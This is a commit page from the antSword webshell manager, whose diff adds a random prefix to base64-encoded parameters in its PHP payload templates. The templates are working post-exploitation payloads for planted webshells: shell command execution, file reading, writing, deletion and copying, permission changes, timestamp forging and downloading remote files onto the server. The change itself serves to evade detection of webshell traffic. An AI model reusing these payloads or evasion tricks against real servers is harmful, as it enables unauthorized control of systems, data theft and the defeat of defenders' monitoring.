Skip to content

A
antSword
Commit 7e7720fc authored by yzddmr6's avatar yzddmr6
Browse files
Options

update 

给其他参数增加随机前缀
parent 30f0dd1b
Hide whitespace changes
Inline Side-by-side
Showing with 92 additions and 45 deletions
source/core/base.js
View file @ 7e7720fc
......@@ -129,7 +129,9 @@ class Base {
* @param {String} encode [字符串编码,默认utf8]
* @return {Object} [返回字符串处理函数对象]
*/
format(encode) {
format(opts) {
let encode=opts['encode'];
let randomPrefix= parseInt(opts.otherConf["random-Prefix"]);
return {
/**
* base64编码
......@@ -139,6 +141,20 @@ class Base {
base64(str) {
return Buffer.from(iconv.encode(Buffer.from(str), encode)).toString('base64');
},
/**
* 增加随机前缀的base64编码
* @param {String} str 字符串
* @return {String} 编码后的字符串
*/
newbase64(str) {
let randomString=(length)=>{
let chars='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
let result = '';
for (let i = length; i > 0; --i) result += chars[Math.floor(Math.random() * chars.length)];
return result;
}
return randomString(randomPrefix)+Buffer.from(iconv.encode(Buffer.from(str), encode)).toString('base64');
},
/**
* 字符串转16进制(不进行编码转换
* @param {String} str 转换的字符串
......@@ -175,10 +191,9 @@ class Base {
// 加载模板
let _argv = this.argv();
let templateObj = require(`${tpl}`)(_argv[0], _argv[1], _argv[2], _argv[3], _argv[4], _argv[5]);
// let formatter = new this.format(this.__opts__['encode']);
let formatter = Base
.prototype
.format(this.__opts__['encode']);
.format(this.__opts__);
// 解析模板
for (let funcName in templateObj) {
this[templateName][funcName] = ((args) => {
......@@ -211,6 +226,7 @@ class Base {
})
}
// 发送HTTP请求
data['_']=data['_'].replace(/#randomPrefix#/g,this.__opts__.otherConf["random-Prefix"]);
return data;
}
} else {
......@@ -331,6 +347,7 @@ class Base {
chunkStepMax: (this.__opts__['otherConf'] || {})['chunk-step-byte-max'] || 3,
useMultipart: (this.__opts__['otherConf'] || {})['use-multipart'] === 1,
addMassData: (this.__opts__['otherConf'] || {})['add-MassData'] === 1,
randomPrefix: parseInt((this.__opts__['otherConf'] || {})['random-Prefix']),
useRandomVariable: (this.__opts__['otherConf'] || {})['use-random-variable'] === 1,
timeout: parseInt((this.__opts__['otherConf'] || {})['request-timeout']),
headers: (this.__opts__['httpConf'] || {})['headers'] || {},
......@@ -384,6 +401,7 @@ class Base {
chunkStepMax: (this.__opts__['otherConf'] || {})['chunk-step-byte-max'] || 3,
useMultipart: (this.__opts__['otherConf'] || {})['use-multipart'] === 1,
addMassData: (this.__opts__['otherConf'] || {})['add-MassData'] === 1,
randomPrefix: parseInt((this.__opts__['otherConf'] || {})['random-Prefix']),
useRandomVariable: (this.__opts__['otherConf'] || {})['use-random-variable'] === 1,
timeout: parseInt((this.__opts__['otherConf'] || {})['request-timeout']),
headers: (this.__opts__['httpConf'] || {})['headers'] || {},
......
source/core/php/template/command.js
View file @ 7e7720fc
......@@ -4,9 +4,9 @@
module.exports = (arg1, arg2, arg3) => ({
exec: {
_: `$p=base64_decode($_POST["${arg1}"]);
$s=base64_decode($_POST["${arg2}"]);
$envstr=@base64_decode($_POST["${arg3}"]);
_: `$p=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));
$s=base64_decode(substr($_POST["${arg2}"],#randomPrefix#));
$envstr=@base64_decode(substr($_POST["${arg3}"],#randomPrefix#));
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";
if(substr($d,0,1)=="/"){
......@@ -102,20 +102,20 @@ module.exports = (arg1, arg2, arg3) => ({
};
$ret=@runcmd($r." 2>&1");
print ($ret!=0)?"ret={$ret}":"";`.replace(/\n\s+/g, ''),
[arg1]: "#{base64::bin}",
[arg2]: "#{base64::cmd}",
[arg3]: "#{base64::env}"
[arg1]: "#{newbase64::bin}",
[arg2]: "#{newbase64::cmd}",
[arg3]: "#{newbase64::env}"
},
listcmd: {
_: `$arr=explode(",",base64_decode($_POST["${arg1}"]));
_: `$arr=explode(",",base64_decode(substr($_POST["${arg1}"],#randomPrefix#)));
foreach($arr as $v){
echo($v."\t".(file_exists($v)?"1":"0")."\n");
}`.replace(/\n\s+/g, ''),
[arg1]: "#{base64::binarr}"
[arg1]: "#{newbase64::binarr}"
},
quote: {
_: `$p=base64_decode($_POST["${arg1}"]);$s=base64_decode($_POST["${arg2}"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";echo \`{$r} 2>&1\``,
[arg1]: "#{base64::bin}",
[arg2]: "#{base64::cmd}"
_: `$p=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$s=base64_decode(substr($_POST["${arg2}"],#randomPrefix#));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";echo \`{$r} 2>&1\``,
[arg1]: "#{newbase64::bin}",
[arg2]: "#{newbase64::cmd}"
}
})
\ No newline at end of file
source/core/php/template/filemanager.js
View file @ 7e7720fc
......@@ -4,69 +4,69 @@
module.exports = (arg1, arg2, arg3) => ({
dir: {
_: `$D=base64_decode($_POST["${arg1}"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);}`,
[arg1]: "#{base64::path}"
_: `$D=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);}`,
[arg1]: "#{newbase64::path}"
},
delete: {
_: `function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}$F=base64_decode(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");}`,
[arg1]: "#{base64::path}"
_: `function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}$F=base64_decode(substr(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");}`,
[arg1]: "#{newbase64::path}"
},
create_file: {
_: `echo @fwrite(fopen(base64_decode($_POST["${arg1}"]),"w"),base64_decode($_POST["${arg2}"]))?"1":"0";`,
[arg1]: "#{base64::path}",
[arg2]: "#{base64::content}"
_: `echo @fwrite(fopen(base64_decode(substr($_POST["${arg1}"],#randomPrefix#)),"w"),base64_decode(substr($_POST["${arg2}"],#randomPrefix#)))?"1":"0";`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::content}"
},
read_file: {
_: `$F=base64_decode($_POST["${arg1}"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);`,
[arg1]: "#{base64::path}"
_: `$F=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);`,
[arg1]: "#{newbase64::path}"
},
copy: {
_: `$m=get_magic_quotes_gpc();$fc=base64_decode($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$fp=base64_decode($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]);function xcopy($src,$dest){if(is_file($src)){if(!copy($src,$dest))return false;else return true;}$m=@dir($src);if(!is_dir($dest))if(!@mkdir($dest))return false;while($f=$m->read()){$isrc=$src.chr(47).$f;$idest=$dest.chr(47).$f;if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){if(!xcopy($isrc,$idest))return false;}else if(is_file($isrc)){if(!copy($isrc,$idest))return false;}}return true;}echo(xcopy($fc,$fp)?"1":"0");`,
[arg1]: "#{base64::path}",
[arg2]: "#{base64::target}"
_: `$m=get_magic_quotes_gpc();$fc=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$fp=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));function xcopy($src,$dest){if(is_file($src)){if(!copy($src,$dest))return false;else return true;}$m=@dir($src);if(!is_dir($dest))if(!@mkdir($dest))return false;while($f=$m->read()){$isrc=$src.chr(47).$f;$idest=$dest.chr(47).$f;if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){if(!xcopy($isrc,$idest))return false;}else if(is_file($isrc)){if(!copy($isrc,$idest))return false;}}return true;}echo(xcopy($fc,$fp)?"1":"0");`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::target}"
},
download_file: {
_: `$F=base64_decode(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");}`,
[arg1]: "#{base64::path}"
_: `$F=base64_decode(substr(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");}`,
[arg1]: "#{newbase64::path}"
},
upload_file: {
_: `$f=base64_decode($_POST["${arg1}"]);$c=$_POST["${arg2}"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");`,
[arg1]: "#{base64::path}",
_: `$f=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$c=$_POST["${arg2}"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{buffer::content}"
},
rename: {
_: `$m=get_magic_quotes_gpc();$src=base64_decode(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$dst=base64_decode(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]);echo(rename($src,$dst)?"1":"0");`,
[arg1]: "#{base64::path}",
[arg2]: "#{base64::name}"
_: `$m=get_magic_quotes_gpc();$src=base64_decode(substr(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$dst=base64_decode(substr(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));echo(rename($src,$dst)?"1":"0");`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::name}"
},
retime: {
_: `$m=get_magic_quotes_gpc();$FN=base64_decode(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$TM=strtotime(base64_decode(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]));if(file_exists($FN)){echo(@touch($FN,$TM,$TM)?"1":"0");}else{echo("0");};`,
[arg1]: "#{base64::path}",
[arg2]: "#{base64::time}"
_: `$m=get_magic_quotes_gpc();$FN=base64_decode(substr(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$TM=strtotime(base64_decode(substr(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]),#randomPrefix#));if(file_exists($FN)){echo(@touch($FN,$TM,$TM)?"1":"0");}else{echo("0");};`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::time}"
},
chmod: {
_: `$m=get_magic_quotes_gpc();$FN=base64_decode(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$mode=base64_decode(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]);echo(chmod($FN,octdec($mode))?"1":"0");`,
[arg1]: "#{base64::path}",
[arg2]: "#{base64::mode}"
_: `$m=get_magic_quotes_gpc();$FN=base64_decode(substr(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$mode=base64_decode(substr(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));echo(chmod($FN,octdec($mode))?"1":"0");`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::mode}"
},
mkdir: {
_: `$m=get_magic_quotes_gpc();$f=base64_decode($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);echo(mkdir($f)?"1":"0");`,
[arg1]: "#{base64::path}"
_: `$m=get_magic_quotes_gpc();$f=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));echo(mkdir($f)?"1":"0");`,
[arg1]: "#{newbase64::path}"
},
wget: {
_: `$fR=base64_decode($_POST["${arg1}"]);$fL=base64_decode($_POST["${arg2}"]);$F=@fopen($fR,chr(114));$L=@fopen($fL,chr(119));if($F && $L){while(!feof($F))@fwrite($L,@fgetc($F));@fclose($F);@fclose($L);echo("1");}else{echo("0");};`,
[arg1]: "#{base64::url}",
[arg2]: "#{base64::path}"
_: `$fR=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$fL=base64_decode(substr($_POST["${arg2}"],#randomPrefix#));$F=@fopen($fR,chr(114));$L=@fopen($fL,chr(119));if($F && $L){while(!feof($F))@fwrite($L,@fgetc($F));@fclose($F);@fclose($L);echo("1");}else{echo("0");};`,
[arg1]: "#{newbase64::url}",
[arg2]: "#{newbase64::path}"
}
})
\ No newline at end of file
source/language/en.js
View file @ 7e7720fc
......@@ -177,6 +177,7 @@ module.exports = {
nohttps: 'Ignore HTTPS certificate',
usemultipart: 'Use Multipart send payload',
addMassData: 'Add garbage data in payload',
randomPrefix: 'Random prefix length',
userandomvariable: 'Use random English word variables',
chunk: {
title: 'Chunked Transfer (Experimentally)',
......
source/language/zh.js
View file @ 7e7720fc
......@@ -180,6 +180,7 @@ module.exports = {
usemultipart: '使用 Multipart 发包',
userandomvariable: '使用随机英文单词变量',
addMassData: '增加垃圾数据',
randomPrefix: '随机前缀长度',
chunk: {
title: '分块传输(实验性功能)',
usechunk: '开启分块传输发包',
......
source/language/zh_hk.js
View file @ 7e7720fc
......@@ -178,6 +178,7 @@ module.exports = {
nohttps: '忽略HTTPS證書',
usemultipart: '使用 Multipart 發包',
addMassData: '增加垃圾數據',
randomPrefix: '隨機前綴長度',
userandomvariable: '使用隨機英文單詞變量',
chunk: {
title: '分塊傳輸(實驗性功能)',
......
source/language/zh_tw.js
View file @ 7e7720fc
......@@ -178,6 +178,7 @@ module.exports = {
nohttps: '忽略HTTPS證書',
usemultipart: '使用 Multipart 發包',
addMassData: '增加垃圾數據',
randomPrefix: '隨機前綴長度',
userandomvariable: '使用隨機英文單詞變量',
chunk: {
title: '分塊傳輸(實驗性功能)',
......
source/modules/settings/adefault.js
View file @ 7e7720fc
......@@ -28,7 +28,8 @@ class ADefault {
others: {
"ignore-https": 0,
"use-random-variable": 0,
"request-timeout": '10000'
"request-timeout": '10000',
"random-Prefix": '2'
}
},
terminal: {
......
source/modules/shellmanager/list/form.js
View file @ 7e7720fc
......@@ -467,6 +467,7 @@ class Form {
'ignore-https': 0,
'use-multipart': 0,
'add-MassData': 0,
'random-Prefix': '2',
'use-random-variable': 0,
'use-chunk': 0,
'chunk-step-byte-min': 2,
......@@ -608,9 +609,32 @@ class Form {
name: 'filemanager-cache',
label: LANG['list']['otherConf']['filemanagerCache'],
checked: opt['filemanager-cache'] === 1
}, {
type: "label",
label: LANG['list']['otherConf']['randomPrefix']
}, {
type: "combo",
inputWidth: 100,
name: "random-Prefix",
options: ((items) => {
let ret = [];
// 如果自定义的路径不在items里,则++
if (items.indexOf(opt['random-Prefix']) === -1) {
items.unshift(opt['random-Prefix']);
}
items.map((_) => {
ret.push({
text: _,
value: _,
selected: opt['random-Prefix'] === _
})
});
return ret;
})(['1', '2', '3', '5','10','15'])
}, {
type: "label",
label: LANG['list']['otherConf']['uploadFragment']
}, {
type: "combo",
label: '/kb',
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment